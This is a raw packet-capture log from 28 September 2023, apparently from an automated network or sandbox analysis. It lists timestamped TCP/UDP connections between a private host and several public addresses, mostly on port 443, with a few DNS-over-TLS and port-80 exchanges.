Sep 28, 2023 14:35:42.576836109 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.594465971 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.617515087 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.633682013 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.633738995 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.634041071 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.635164976 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.635178089 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.635510921 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.637094021 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.637114048 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.637140989 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.637458086 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.654062033 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.654074907 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.674556017 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.695698977 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.711918116 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.711976051 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.712358952 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.713984013 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.714040041 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.714407921 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.730011940 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.730071068 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.758459091 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.761056900 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.788872004 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.788924932 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.789331913 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.791399002 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.791456938 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.791779041 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.866564035 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.866621971 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.867372990 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.897643089 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.897670031 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.898451090 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.914623022 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.914649963 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.915657997 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.919512987 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.919570923 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.920067072 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.921014071 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.921041012 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.921300888 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.927648067 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.927706957 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.929315090 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.973845005 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:42.973903894 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:42.974526882 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.046745062 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.046804905 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.047280073 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.048407078 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.048492908 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.048878908 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.051047087 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.051062107 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.051621914 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.082216024 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.082274914 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.097568035 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.100536108 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.100588083 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.100629091 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.101315975 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.104590893 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.104649067 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.105079889 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.107014894 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.107047081 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.107546091 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.109947920 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.109960079 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.110579967 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.142926931 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.142983913 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.158096075 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.189932108 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.189985037 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.190368891 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.192063093 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.192079067 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.192374945 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.194948912 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.194958925 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:43.195602894 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.478713036 CEST	32896	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:43.478781939 CEST	443	32896	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:49.602971077 CEST	33850	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:35:49.618814945 CEST	33850	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:35:49.798291922 CEST	80	33850	135.181.49.35	192.168.2.30
Sep 28, 2023 14:35:49.814064026 CEST	80	33850	135.181.49.35	192.168.2.30
Sep 28, 2023 14:35:49.815218925 CEST	80	33850	135.181.49.35	192.168.2.30
Sep 28, 2023 14:35:49.815345049 CEST	33850	80	192.168.2.30	135.181.49.35
Sep 28, 2023 14:35:52.612549067 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:52.612644911 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:52.612721920 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:52.646970987 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:52.647058964 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:52.851351976 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:52.851733923 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:52.852966070 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:52.853014946 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:52.854002953 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:52.854018927 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.081526995 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.081648111 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.081727028 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.081796885 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.081857920 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.081917048 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.081923962 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.081984043 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.082736015 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.086744070 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.093238115 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.093395948 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.093466043 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.093528986 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.099909067 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.106328011 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.108830929 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.108895063 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.150590897 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.175204992 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.175530910 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.175601006 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.175657988 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.177887917 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.178091049 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.178150892 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.178222895 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.184987068 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.185157061 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.185204029 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.185452938 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.191241980 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.191472054 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.191533089 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.191598892 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.197621107 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.197813988 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.197874069 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.197933912 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.204165936 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.204230070 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.204289913 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.204330921 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.211946011 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.212018013 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.212045908 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.212099075 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.212167025 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.212213039 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.219335079 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.219400883 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.219528913 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.219569921 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.222965956 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.223042011 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.223079920 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.223145008 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.229517937 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.235200882 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.235249996 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.235276937 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.241925001 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.241980076 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.242090940 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.242122889 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.248641968 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.252912998 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.252974033 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.268573999 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.268738985 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.271327972 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.271514893 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.276525974 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.277240992 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.279757977 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.279824972 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.281018972 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.281366110 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.281383038 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.285109997 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.285162926 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.285178900 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.291651011 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.294486046 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.294563055 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.298048019 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.298141003 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.301953077 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.302035093 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.307274103 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.307727098 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:53.325401068 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.561115980 CEST	32898	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:53.561218977 CEST	443	32898	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:55.252410889 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:55.343715906 CEST	853	47612	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:57.501591921 CEST	42578	443	192.168.2.30	142.251.32.78
Sep 28, 2023 14:35:57.501719952 CEST	42578	443	192.168.2.30	142.251.32.78
Sep 28, 2023 14:35:57.521225929 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:57.606929064 CEST	443	42578	142.251.32.78	192.168.2.30
Sep 28, 2023 14:35:57.606956959 CEST	443	42578	142.251.32.78	192.168.2.30
Sep 28, 2023 14:35:57.617522955 CEST	853	47612	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:57.620491028 CEST	853	47612	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:57.620656967 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:57.624422073 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:57.624494076 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:57.624564886 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:57.638937950 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:57.639010906 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:57.843849897 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:57.844084024 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:57.851212978 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:57.851267099 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:57.852255106 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:57.866466999 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:57.866688013 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:57.882303953 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:57.882581949 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:57.882932901 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:57.882992983 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:57.923655033 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:58.172863960 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:58.172982931 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:58.173012018 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:58.174079895 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:58.174110889 CEST	443	39584	142.251.32.110	192.168.2.30
Sep 28, 2023 14:35:58.174129009 CEST	39584	443	192.168.2.30	142.251.32.110
Sep 28, 2023 14:35:58.201956987 CEST	40774	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.202028036 CEST	40774	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.202425957 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:58.292732000 CEST	443	40774	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.292876005 CEST	443	40774	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.298527002 CEST	853	47612	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:58.300736904 CEST	853	47612	8.8.4.4	192.168.2.30
Sep 28, 2023 14:35:58.300791979 CEST	47612	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:35:58.318274021 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.318329096 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.318418980 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.321022987 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.321037054 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.523571968 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.523787975 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.524674892 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.524688005 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.526262999 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.542443037 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.542535067 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.585496902 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.585592031 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.585648060 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.585663080 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.585701942 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.586126089 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.586179972 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.586199045 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.586236954 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.586252928 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.586261034 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.586275101 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.586297989 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.724129915 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.724180937 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.724617958 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.739285946 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.798661947 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:58.798696995 CEST	443	40806	142.250.80.106	192.168.2.30
Sep 28, 2023 14:35:58.798757076 CEST	40806	443	192.168.2.30	142.250.80.106
Sep 28, 2023 14:35:59.523550987 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.523634911 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.523760080 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.527426958 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.527503014 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.727041960 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.727150917 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.727297068 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.727308035 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.728162050 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.728167057 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.728218079 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.728224039 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.728245974 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.728246927 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.728267908 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.728269100 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.728286028 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.728296995 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.728321075 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.728327036 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.948240042 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.948379040 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.948520899 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.948611975 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.948700905 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.948766947 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.954077005 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.960130930 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.961390018 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.961421967 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.961561918 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.966655970 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.973022938 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:35:59.973099947 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:35:59.973129988 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.014516115 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.014573097 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.014697075 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.039469004 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.039668083 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.039725065 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.039798975 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.042320013 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.042500973 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.042558908 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.042610884 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.048846960 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.049047947 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.049105883 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.049165010 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.054876089 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.055036068 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.055094004 CEST	443	32904	142.250.65.170	192.168.2.30
Sep 28, 2023 14:36:00.055149078 CEST	32904	443	192.168.2.30	142.250.65.170
Sep 28, 2023 14:36:00.061683893 CEST	443	32904	142.250.65.170	192.168.2.30
